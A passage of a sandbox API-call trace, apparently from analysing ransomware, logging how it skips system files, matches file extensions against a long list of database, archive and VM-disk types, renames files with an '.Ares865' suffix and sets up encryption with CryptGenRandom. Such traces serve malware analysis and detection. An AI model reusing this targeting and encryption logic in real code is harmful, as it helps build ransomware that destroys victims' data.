4 [0084.911] lstrcmpiW (lpString1=".bmp", lpString2="rodx") returned -1 [0084.911] lstrlenW (lpString="rpd") returned 3 [0084.911] lstrcmpiW (lpString1="bmp", lpString2="rpd") returned -1 [0084.911] lstrlenW (lpString="rsd") returned 3 [0084.911] lstrcmpiW (lpString1="bmp", lpString2="rsd") returned -1 [0084.911] lstrlenW (lpString="sas7bdat") returned 8 [0084.911] lstrcmpiW (lpString1="le23.bmp", lpString2="sas7bdat") returned -1 [0084.911] lstrlenW (lpString="sbf") returned 3 [0084.911] lstrcmpiW (lpString1="bmp", lpString2="sbf") returned -1 [0084.911] lstrlenW (lpString="scx") returned 3 [0084.911] lstrcmpiW (lpString1="bmp", lpString2="scx") returned -1 [0084.911] lstrlenW (lpString="sdb") returned 3 [0084.911] lstrcmpiW (lpString1="bmp", lpString2="sdb") returned -1 [0084.911] lstrlenW (lpString="sdc") returned 3 [0084.911] lstrcmpiW (lpString1="bmp", lpString2="sdc") returned -1 [0084.911] lstrlenW (lpString="sdf") returned 3 [0084.911] lstrcmpiW (lpString1="bmp", lpString2="sdf") returned -1 [0084.911] lstrlenW (lpString="sis") returned 3 [0084.911] lstrcmpiW (lpString1="bmp", lpString2="sis") returned -1 [0084.911] lstrlenW (lpString="spq") returned 3 [0084.911] lstrcmpiW (lpString1="bmp", lpString2="spq") returned -1 [0084.911] lstrlenW (lpString="te") returned 2 [0084.911] lstrcmpiW (lpString1="mp", lpString2="te") returned -1 [0084.911] lstrlenW (lpString="teacher") returned 7 [0084.911] lstrcmpiW (lpString1="e23.bmp", lpString2="teacher") returned -1 [0084.911] lstrlenW (lpString="tmd") returned 3 [0084.911] lstrcmpiW (lpString1="bmp", lpString2="tmd") returned -1 [0084.911] lstrlenW (lpString="tps") returned 3 [0084.911] lstrcmpiW (lpString1="bmp", lpString2="tps") returned -1 [0084.911] lstrlenW (lpString="trc") returned 3 [0084.911] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0084.911] lstrlenW (lpString="trc") returned 3 [0084.911] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0084.912] lstrlenW (lpString="trm") returned 3 [0084.912] lstrcmpiW (lpString1="bmp", lpString2="trm") returned -1 [0084.912] lstrlenW (lpString="udb") returned 3 [0084.912] lstrcmpiW (lpString1="bmp", lpString2="udb") returned -1 [0084.912] lstrlenW (lpString="udl") returned 3 [0084.912] lstrcmpiW (lpString1="bmp", lpString2="udl") returned -1 [0084.912] lstrlenW (lpString="usr") returned 3 [0084.912] lstrcmpiW (lpString1="bmp", lpString2="usr") returned -1 [0084.912] lstrlenW (lpString="v12") returned 3 [0084.912] lstrcmpiW (lpString1="bmp", lpString2="v12") returned -1 [0084.912] lstrlenW (lpString="vis") returned 3 [0084.912] lstrcmpiW (lpString1="bmp", lpString2="vis") returned -1 [0084.912] lstrlenW (lpString="vpd") returned 3 [0084.912] lstrcmpiW (lpString1="bmp", lpString2="vpd") returned -1 [0084.912] lstrlenW (lpString="vvv") returned 3 [0084.912] lstrcmpiW (lpString1="bmp", lpString2="vvv") returned -1 [0084.912] lstrlenW (lpString="wdb") returned 3 [0084.912] lstrcmpiW (lpString1="bmp", lpString2="wdb") returned -1 [0084.912] lstrlenW (lpString="wmdb") returned 4 [0084.912] lstrcmpiW (lpString1=".bmp", lpString2="wmdb") returned -1 [0084.912] lstrlenW (lpString="wrk") returned 3 [0084.912] lstrcmpiW (lpString1="bmp", lpString2="wrk") returned -1 [0084.912] lstrlenW (lpString="xdb") returned 3 [0084.912] lstrcmpiW (lpString1="bmp", lpString2="xdb") returned -1 [0084.912] lstrlenW (lpString="xld") returned 3 [0084.912] lstrcmpiW (lpString1="bmp", lpString2="xld") returned -1 [0084.912] lstrlenW (lpString="xmlff") returned 5 [0084.912] lstrcmpiW (lpString1="3.bmp", lpString2="xmlff") returned -1 [0084.912] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp.Ares865") returned 90 [0084.912] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile23.bmp"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile23.bmp.ares865"), dwFlags=0x1) returned 1 [0084.913] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile23.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0084.913] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49208) returned 1 [0084.913] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0084.914] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0084.914] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0084.914] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0084.914] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0084.915] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0084.915] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc340, lpName=0x0) returned 0x15c [0084.916] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc340) returned 0x190000 [0084.928] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0084.929] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0084.929] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0084.929] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0084.929] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0084.929] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0084.929] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0084.929] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0084.929] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0084.929] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0084.930] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0084.930] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0084.930] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0084.930] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0084.930] CloseHandle (hObject=0x15c) returned 1 [0084.930] CloseHandle (hObject=0x118) returned 1 [0084.930] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0084.930] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0084.930] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0084.931] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3f2373, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae3f2373, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd232fa7, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile24.bmp", cAlternateFileName="")) returned 1 [0084.931] lstrcmpiW (lpString1="usertile24.bmp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0084.931] lstrcmpiW (lpString1="usertile24.bmp", lpString2="aoldtz.exe") returned 1 [0084.931] lstrcmpiW (lpString1="usertile24.bmp", lpString2=".") returned 1 [0084.931] lstrcmpiW (lpString1="usertile24.bmp", lpString2="..") returned 1 [0084.931] lstrcmpiW (lpString1="usertile24.bmp", lpString2="windows") returned -1 [0084.931] lstrcmpiW (lpString1="usertile24.bmp", lpString2="bootmgr") returned 1 [0084.931] lstrcmpiW (lpString1="usertile24.bmp", lpString2="temp") returned 1 [0084.931] lstrcmpiW (lpString1="usertile24.bmp", lpString2="pagefile.sys") returned 1 [0084.931] lstrcmpiW (lpString1="usertile24.bmp", lpString2="boot") returned 1 [0084.931] lstrcmpiW (lpString1="usertile24.bmp", lpString2="ids.txt") returned 1 [0084.931] lstrcmpiW (lpString1="usertile24.bmp", lpString2="ntuser.dat") returned 1 [0084.931] lstrcmpiW (lpString1="usertile24.bmp", lpString2="perflogs") returned 1 [0084.931] lstrcmpiW (lpString1="usertile24.bmp", lpString2="MSBuild") returned 1 [0084.931] lstrlenW (lpString="usertile24.bmp") returned 14 [0084.931] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp") returned 82 [0084.931] lstrcpyW (in: lpString1=0x2cce488, lpString2="usertile24.bmp" | out: lpString1="usertile24.bmp") returned="usertile24.bmp" [0084.931] lstrlenW (lpString="usertile24.bmp") returned 14 [0084.931] lstrlenW (lpString="Ares865") returned 7 [0084.931] lstrcmpiW (lpString1="e24.bmp", lpString2="Ares865") returned 1 [0084.931] lstrlenW (lpString=".dll") returned 4 [0084.931] lstrcmpiW (lpString1="usertile24.bmp", lpString2=".dll") returned 1 [0084.931] lstrlenW (lpString=".lnk") returned 4 [0084.931] lstrcmpiW (lpString1="usertile24.bmp", lpString2=".lnk") returned 1 [0084.931] lstrlenW (lpString=".ini") returned 4 [0084.931] lstrcmpiW (lpString1="usertile24.bmp", lpString2=".ini") returned 1 [0084.932] lstrlenW (lpString=".sys") returned 4 [0084.932] lstrcmpiW (lpString1="usertile24.bmp", lpString2=".sys") returned 1 [0084.932] lstrlenW (lpString="usertile24.bmp") returned 14 [0084.932] lstrlenW (lpString="bak") returned 3 [0084.932] lstrcmpiW (lpString1="bmp", lpString2="bak") returned 1 [0084.932] lstrlenW (lpString="ba_") returned 3 [0084.932] lstrcmpiW (lpString1="bmp", lpString2="ba_") returned 1 [0084.932] lstrlenW (lpString="dbb") returned 3 [0084.932] lstrcmpiW (lpString1="bmp", lpString2="dbb") returned -1 [0084.932] lstrlenW (lpString="vmdk") returned 4 [0084.932] lstrcmpiW (lpString1=".bmp", lpString2="vmdk") returned -1 [0084.932] lstrlenW (lpString="rar") returned 3 [0084.932] lstrcmpiW (lpString1="bmp", lpString2="rar") returned -1 [0084.932] lstrlenW (lpString="zip") returned 3 [0084.932] lstrcmpiW (lpString1="bmp", lpString2="zip") returned -1 [0084.932] lstrlenW (lpString="tgz") returned 3 [0084.932] lstrcmpiW (lpString1="bmp", lpString2="tgz") returned -1 [0084.932] lstrlenW (lpString="vbox") returned 4 [0084.932] lstrcmpiW (lpString1=".bmp", lpString2="vbox") returned -1 [0084.932] lstrlenW (lpString="vdi") returned 3 [0084.932] lstrcmpiW (lpString1="bmp", lpString2="vdi") returned -1 [0084.932] lstrlenW (lpString="vhd") returned 3 [0084.932] lstrcmpiW (lpString1="bmp", lpString2="vhd") returned -1 [0084.932] lstrlenW (lpString="vhdx") returned 4 [0084.932] lstrcmpiW (lpString1=".bmp", lpString2="vhdx") returned -1 [0084.932] lstrlenW (lpString="avhd") returned 4 [0084.932] lstrcmpiW (lpString1=".bmp", lpString2="avhd") returned -1 [0084.932] lstrlenW (lpString="db") returned 2 [0084.932] lstrcmpiW (lpString1="mp", lpString2="db") returned 1 [0084.932] lstrlenW (lpString="db2") returned 3 [0084.932] lstrcmpiW (lpString1="bmp", lpString2="db2") returned -1 [0084.932] lstrlenW (lpString="db3") returned 3 [0084.932] lstrcmpiW (lpString1="bmp", lpString2="db3") returned -1 [0084.932] lstrlenW (lpString="dbf") returned 3 [0084.932] lstrcmpiW (lpString1="bmp", lpString2="dbf") returned -1 [0084.932] lstrlenW (lpString="mdf") returned 3 [0084.932] lstrcmpiW (lpString1="bmp", lpString2="mdf") returned -1 [0084.932] lstrlenW (lpString="mdb") returned 3 [0084.933] lstrcmpiW (lpString1="bmp", lpString2="mdb") returned -1 [0084.933] lstrlenW (lpString="sql") returned 3 [0084.933] lstrcmpiW (lpString1="bmp", lpString2="sql") returned -1 [0084.933] lstrlenW (lpString="sqlite") returned 6 [0084.933] lstrcmpiW (lpString1="24.bmp", lpString2="sqlite") returned -1 [0084.933] lstrlenW (lpString="sqlite3") returned 7 [0084.933] lstrcmpiW (lpString1="e24.bmp", lpString2="sqlite3") returned -1 [0084.933] lstrlenW (lpString="sqlitedb") returned 8 [0084.933] lstrcmpiW (lpString1="le24.bmp", lpString2="sqlitedb") returned -1 [0084.933] lstrlenW (lpString="xml") returned 3 [0084.933] lstrcmpiW (lpString1="bmp", lpString2="xml") returned -1 [0084.933] lstrlenW (lpString="$er") returned 3 [0084.933] lstrcmpiW (lpString1="bmp", lpString2="$er") returned 1 [0084.933] lstrlenW (lpString="4dd") returned 3 [0084.933] lstrcmpiW (lpString1="bmp", lpString2="4dd") returned 1 [0084.933] lstrlenW (lpString="4dl") returned 3 [0084.933] lstrcmpiW (lpString1="bmp", lpString2="4dl") returned 1 [0084.933] lstrlenW (lpString="^^^") returned 3 [0084.933] lstrcmpiW (lpString1="bmp", lpString2="^^^") returned 1 [0084.933] lstrlenW (lpString="abs") returned 3 [0084.933] lstrcmpiW (lpString1="bmp", lpString2="abs") returned 1 [0084.933] lstrlenW (lpString="abx") returned 3 [0084.933] lstrcmpiW (lpString1="bmp", lpString2="abx") returned 1 [0084.933] lstrlenW (lpString="accdb") returned 5 [0084.933] lstrcmpiW (lpString1="4.bmp", lpString2="accdb") returned -1 [0084.933] lstrlenW (lpString="accdc") returned 5 [0084.933] lstrcmpiW (lpString1="4.bmp", lpString2="accdc") returned -1 [0084.933] lstrlenW (lpString="accde") returned 5 [0084.933] lstrcmpiW (lpString1="4.bmp", lpString2="accde") returned -1 [0084.933] lstrlenW (lpString="accdr") returned 5 [0084.933] lstrcmpiW (lpString1="4.bmp", lpString2="accdr") returned -1 [0084.933] lstrlenW (lpString="accdt") returned 5 [0084.933] lstrcmpiW (lpString1="4.bmp", lpString2="accdt") returned -1 [0084.933] lstrlenW (lpString="accdw") returned 5 [0084.933] lstrcmpiW (lpString1="4.bmp", lpString2="accdw") returned -1 [0084.933] lstrlenW (lpString="accft") returned 5 [0084.933] lstrcmpiW (lpString1="4.bmp", lpString2="accft") returned -1 [0084.933] lstrlenW (lpString="adb") returned 3 [0084.934] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0084.934] lstrlenW (lpString="adb") returned 3 [0084.934] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0084.934] lstrlenW (lpString="ade") returned 3 [0084.934] lstrcmpiW (lpString1="bmp", lpString2="ade") returned 1 [0084.934] lstrlenW (lpString="adf") returned 3 [0084.934] lstrcmpiW (lpString1="bmp", lpString2="adf") returned 1 [0084.934] lstrlenW (lpString="adn") returned 3 [0084.934] lstrcmpiW (lpString1="bmp", lpString2="adn") returned 1 [0084.934] lstrlenW (lpString="adp") returned 3 [0084.934] lstrcmpiW (lpString1="bmp", lpString2="adp") returned 1 [0084.934] lstrlenW (lpString="alf") returned 3 [0084.934] lstrcmpiW (lpString1="bmp", lpString2="alf") returned 1 [0084.934] lstrlenW (lpString="ask") returned 3 [0084.934] lstrcmpiW (lpString1="bmp", lpString2="ask") returned 1 [0084.934] lstrlenW (lpString="btr") returned 3 [0084.934] lstrcmpiW (lpString1="bmp", lpString2="btr") returned -1 [0084.934] lstrlenW (lpString="cat") returned 3 [0084.934] lstrcmpiW (lpString1="bmp", lpString2="cat") returned -1 [0084.934] lstrlenW (lpString="cdb") returned 3 [0084.934] lstrcmpiW (lpString1="bmp", lpString2="cdb") returned -1 [0084.934] lstrlenW (lpString="ckp") returned 3 [0084.934] lstrcmpiW (lpString1="bmp", lpString2="ckp") returned -1 [0084.934] lstrlenW (lpString="cma") returned 3 [0084.934] lstrcmpiW (lpString1="bmp", lpString2="cma") returned -1 [0084.934] lstrlenW (lpString="cpd") returned 3 [0084.934] lstrcmpiW (lpString1="bmp", lpString2="cpd") returned -1 [0084.934] lstrlenW (lpString="dacpac") returned 6 [0084.934] lstrcmpiW (lpString1="24.bmp", lpString2="dacpac") returned -1 [0084.934] lstrlenW (lpString="dad") returned 3 [0084.934] lstrcmpiW (lpString1="bmp", lpString2="dad") returned -1 [0084.934] lstrlenW (lpString="dadiagrams") returned 10 [0084.934] lstrcmpiW (lpString1="tile24.bmp", lpString2="dadiagrams") returned 1 [0084.934] lstrlenW (lpString="daschema") returned 8 [0084.934] lstrcmpiW (lpString1="le24.bmp", lpString2="daschema") returned 1 [0084.934] lstrlenW (lpString="db-journal") returned 10 [0084.934] lstrcmpiW (lpString1="tile24.bmp", lpString2="db-journal") returned 1 [0084.934] lstrlenW (lpString="db-shm") returned 6 [0084.935] lstrcmpiW (lpString1="24.bmp", lpString2="db-shm") returned -1 [0084.935] lstrlenW (lpString="db-wal") returned 6 [0084.935] lstrcmpiW (lpString1="24.bmp", lpString2="db-wal") returned -1 [0084.935] lstrlenW (lpString="dbc") returned 3 [0084.935] lstrcmpiW (lpString1="bmp", lpString2="dbc") returned -1 [0084.935] lstrlenW (lpString="dbs") returned 3 [0084.935] lstrcmpiW (lpString1="bmp", lpString2="dbs") returned -1 [0084.935] lstrlenW (lpString="dbt") returned 3 [0084.935] lstrcmpiW (lpString1="bmp", lpString2="dbt") returned -1 [0084.935] lstrlenW (lpString="dbv") returned 3 [0084.935] lstrcmpiW (lpString1="bmp", lpString2="dbv") returned -1 [0084.935] lstrlenW (lpString="dbx") returned 3 [0084.935] lstrcmpiW (lpString1="bmp", lpString2="dbx") returned -1 [0084.935] lstrlenW (lpString="dcb") returned 3 [0084.935] lstrcmpiW (lpString1="bmp", lpString2="dcb") returned -1 [0084.935] lstrlenW (lpString="dct") returned 3 [0084.935] lstrcmpiW (lpString1="bmp", lpString2="dct") returned -1 [0084.935] lstrlenW (lpString="dcx") returned 3 [0084.935] lstrcmpiW (lpString1="bmp", lpString2="dcx") returned -1 [0084.935] lstrlenW (lpString="ddl") returned 3 [0084.935] lstrcmpiW (lpString1="bmp", lpString2="ddl") returned -1 [0084.935] lstrlenW (lpString="dlis") returned 4 [0084.935] lstrcmpiW (lpString1=".bmp", lpString2="dlis") returned -1 [0084.935] lstrlenW (lpString="dp1") returned 3 [0084.935] lstrcmpiW (lpString1="bmp", lpString2="dp1") returned -1 [0084.935] lstrlenW (lpString="dqy") returned 3 [0084.935] lstrcmpiW (lpString1="bmp", lpString2="dqy") returned -1 [0084.935] lstrlenW (lpString="dsk") returned 3 [0084.935] lstrcmpiW (lpString1="bmp", lpString2="dsk") returned -1 [0084.935] lstrlenW (lpString="dsn") returned 3 [0084.935] lstrcmpiW (lpString1="bmp", lpString2="dsn") returned -1 [0084.935] lstrlenW (lpString="dtsx") returned 4 [0084.935] lstrcmpiW (lpString1=".bmp", lpString2="dtsx") returned -1 [0084.935] lstrlenW (lpString="dxl") returned 3 [0084.935] lstrcmpiW (lpString1="bmp", lpString2="dxl") returned -1 [0084.935] lstrlenW (lpString="eco") returned 3 [0084.935] lstrcmpiW (lpString1="bmp", lpString2="eco") returned -1 [0084.935] lstrlenW (lpString="ecx") returned 3 [0084.936] lstrcmpiW (lpString1="bmp", lpString2="ecx") returned -1 [0084.936] lstrlenW (lpString="edb") returned 3 [0084.936] lstrcmpiW (lpString1="bmp", lpString2="edb") returned -1 [0084.936] lstrlenW (lpString="epim") returned 4 [0084.936] lstrcmpiW (lpString1=".bmp", lpString2="epim") returned -1 [0084.936] lstrlenW (lpString="fcd") returned 3 [0084.936] lstrcmpiW (lpString1="bmp", lpString2="fcd") returned -1 [0084.936] lstrlenW (lpString="fdb") returned 3 [0084.936] lstrcmpiW (lpString1="bmp", lpString2="fdb") returned -1 [0084.936] lstrlenW (lpString="fic") returned 3 [0084.936] lstrcmpiW (lpString1="bmp", lpString2="fic") returned -1 [0084.936] lstrlenW (lpString="flexolibrary") returned 12 [0084.936] lstrcmpiW (lpString1="ertile24.bmp", lpString2="flexolibrary") returned -1 [0084.936] lstrlenW (lpString="fm5") returned 3 [0084.936] lstrcmpiW (lpString1="bmp", lpString2="fm5") returned -1 [0084.936] lstrlenW (lpString="fmp") returned 3 [0084.936] lstrcmpiW (lpString1="bmp", lpString2="fmp") returned -1 [0084.936] lstrlenW (lpString="fmp12") returned 5 [0084.936] lstrcmpiW (lpString1="4.bmp", lpString2="fmp12") returned -1 [0084.936] lstrlenW (lpString="fmpsl") returned 5 [0084.936] lstrcmpiW (lpString1="4.bmp", lpString2="fmpsl") returned -1 [0084.936] lstrlenW (lpString="fol") returned 3 [0084.936] lstrcmpiW (lpString1="bmp", lpString2="fol") returned -1 [0084.936] lstrlenW (lpString="fp3") returned 3 [0084.936] lstrcmpiW (lpString1="bmp", lpString2="fp3") returned -1 [0084.936] lstrlenW (lpString="fp4") returned 3 [0084.936] lstrcmpiW (lpString1="bmp", lpString2="fp4") returned -1 [0084.936] lstrlenW (lpString="fp5") returned 3 [0084.936] lstrcmpiW (lpString1="bmp", lpString2="fp5") returned -1 [0084.936] lstrlenW (lpString="fp7") returned 3 [0084.936] lstrcmpiW (lpString1="bmp", lpString2="fp7") returned -1 [0084.936] lstrlenW (lpString="fpt") returned 3 [0084.936] lstrcmpiW (lpString1="bmp", lpString2="fpt") returned -1 [0084.937] lstrlenW (lpString="frm") returned 3 [0084.937] lstrcmpiW (lpString1="bmp", lpString2="frm") returned -1 [0084.937] lstrlenW (lpString="gdb") returned 3 [0084.937] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0084.937] lstrlenW (lpString="gdb") returned 3 [0084.937] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0084.937] lstrlenW (lpString="grdb") returned 4 [0084.937] lstrcmpiW (lpString1=".bmp", lpString2="grdb") returned -1 [0084.937] lstrlenW (lpString="gwi") returned 3 [0084.937] lstrcmpiW (lpString1="bmp", lpString2="gwi") returned -1 [0084.937] lstrlenW (lpString="hdb") returned 3 [0084.937] lstrcmpiW (lpString1="bmp", lpString2="hdb") returned -1 [0084.937] lstrlenW (lpString="his") returned 3 [0084.937] lstrcmpiW (lpString1="bmp", lpString2="his") returned -1 [0084.937] lstrlenW (lpString="ib") returned 2 [0084.937] lstrcmpiW (lpString1="mp", lpString2="ib") returned 1 [0084.937] lstrlenW (lpString="idb") returned 3 [0084.937] lstrcmpiW (lpString1="bmp", lpString2="idb") returned -1 [0084.937] lstrlenW (lpString="ihx") returned 3 [0084.937] lstrcmpiW (lpString1="bmp", lpString2="ihx") returned -1 [0084.937] lstrlenW (lpString="itdb") returned 4 [0084.937] lstrcmpiW (lpString1=".bmp", lpString2="itdb") returned -1 [0084.937] lstrlenW (lpString="itw") returned 3 [0084.937] lstrcmpiW (lpString1="bmp", lpString2="itw") returned -1 [0084.937] lstrlenW (lpString="jet") returned 3 [0084.937] lstrcmpiW (lpString1="bmp", lpString2="jet") returned -1 [0084.937] lstrlenW (lpString="jtx") returned 3 [0084.937] lstrcmpiW (lpString1="bmp", lpString2="jtx") returned -1 [0084.937] lstrlenW (lpString="kdb") returned 3 [0084.937] lstrcmpiW (lpString1="bmp", lpString2="kdb") returned -1 [0084.937] lstrlenW (lpString="kexi") returned 4 [0084.937] lstrcmpiW (lpString1=".bmp", lpString2="kexi") returned -1 [0084.937] lstrlenW (lpString="kexic") returned 5 [0084.937] lstrcmpiW (lpString1="4.bmp", lpString2="kexic") returned -1 [0084.937] lstrlenW (lpString="kexis") returned 5 [0084.937] lstrcmpiW (lpString1="4.bmp", lpString2="kexis") returned -1 [0084.937] lstrlenW (lpString="lgc") returned 3 [0084.937] lstrcmpiW (lpString1="bmp", lpString2="lgc") returned -1 [0084.938] lstrlenW (lpString="lwx") returned 3 [0084.938] lstrcmpiW (lpString1="bmp", lpString2="lwx") returned -1 [0084.938] lstrlenW (lpString="maf") returned 3 [0084.938] lstrcmpiW (lpString1="bmp", lpString2="maf") returned -1 [0084.938] lstrlenW (lpString="maq") returned 3 [0084.938] lstrcmpiW (lpString1="bmp", lpString2="maq") returned -1 [0084.938] lstrlenW (lpString="mar") returned 3 [0084.938] lstrcmpiW (lpString1="bmp", lpString2="mar") returned -1 [0084.938] lstrlenW (lpString="marshal") returned 7 [0084.938] lstrcmpiW (lpString1="e24.bmp", lpString2="marshal") returned -1 [0084.938] lstrlenW (lpString="mas") returned 3 [0084.938] lstrcmpiW (lpString1="bmp", lpString2="mas") returned -1 [0084.938] lstrlenW (lpString="mav") returned 3 [0084.938] lstrcmpiW (lpString1="bmp", lpString2="mav") returned -1 [0084.938] lstrlenW (lpString="maw") returned 3 [0084.938] lstrcmpiW (lpString1="bmp", lpString2="maw") returned -1 [0084.938] lstrlenW (lpString="mdbhtml") returned 7 [0084.938] lstrcmpiW (lpString1="e24.bmp", lpString2="mdbhtml") returned -1 [0084.938] lstrlenW (lpString="mdn") returned 3 [0084.938] lstrcmpiW (lpString1="bmp", lpString2="mdn") returned -1 [0084.938] lstrlenW (lpString="mdt") returned 3 [0084.938] lstrcmpiW (lpString1="bmp", lpString2="mdt") returned -1 [0084.938] lstrlenW (lpString="mfd") returned 3 [0084.938] lstrcmpiW (lpString1="bmp", lpString2="mfd") returned -1 [0084.938] lstrlenW (lpString="mpd") returned 3 [0084.938] lstrcmpiW (lpString1="bmp", lpString2="mpd") returned -1 [0084.938] lstrlenW (lpString="mrg") returned 3 [0084.938] lstrcmpiW (lpString1="bmp", lpString2="mrg") returned -1 [0084.938] lstrlenW (lpString="mud") returned 3 [0084.938] lstrcmpiW (lpString1="bmp", lpString2="mud") returned -1 [0084.938] lstrlenW (lpString="mwb") returned 3 [0084.938] lstrcmpiW (lpString1="bmp", lpString2="mwb") returned -1 [0084.938] lstrlenW (lpString="myd") returned 3 [0084.938] lstrcmpiW (lpString1="bmp", lpString2="myd") returned -1 [0084.938] lstrlenW (lpString="ndf") returned 3 [0084.938] lstrcmpiW (lpString1="bmp", lpString2="ndf") returned -1 [0084.938] lstrlenW (lpString="nnt") returned 3 [0084.938] lstrcmpiW (lpString1="bmp", lpString2="nnt") returned -1 [0084.939] lstrlenW (lpString="nrmlib") returned 6 [0084.939] lstrcmpiW (lpString1="24.bmp", lpString2="nrmlib") returned -1 [0084.939] lstrlenW (lpString="ns2") returned 3 [0084.939] lstrcmpiW (lpString1="bmp", lpString2="ns2") returned -1 [0084.939] lstrlenW (lpString="ns3") returned 3 [0084.939] lstrcmpiW (lpString1="bmp", lpString2="ns3") returned -1 [0084.939] lstrlenW (lpString="ns4") returned 3 [0084.939] lstrcmpiW (lpString1="bmp", lpString2="ns4") returned -1 [0084.939] lstrlenW (lpString="nsf") returned 3 [0084.939] lstrcmpiW (lpString1="bmp", lpString2="nsf") returned -1 [0084.939] lstrlenW (lpString="nv") returned 2 [0084.939] lstrcmpiW (lpString1="mp", lpString2="nv") returned -1 [0084.939] lstrlenW (lpString="nv2") returned 3 [0084.939] lstrcmpiW (lpString1="bmp", lpString2="nv2") returned -1 [0084.939] lstrlenW (lpString="nwdb") returned 4 [0084.939] lstrcmpiW (lpString1=".bmp", lpString2="nwdb") returned -1 [0084.939] lstrlenW (lpString="nyf") returned 3 [0084.939] lstrcmpiW (lpString1="bmp", lpString2="nyf") returned -1 [0084.939] lstrlenW (lpString="odb") returned 3 [0084.939] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0084.939] lstrlenW (lpString="odb") returned 3 [0084.939] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0084.939] lstrlenW (lpString="oqy") returned 3 [0084.939] lstrcmpiW (lpString1="bmp", lpString2="oqy") returned -1 [0084.939] lstrlenW (lpString="ora") returned 3 [0084.939] lstrcmpiW (lpString1="bmp", lpString2="ora") returned -1 [0084.939] lstrlenW (lpString="orx") returned 3 [0084.939] lstrcmpiW (lpString1="bmp", lpString2="orx") returned -1 [0084.939] lstrlenW (lpString="owc") returned 3 [0084.939] 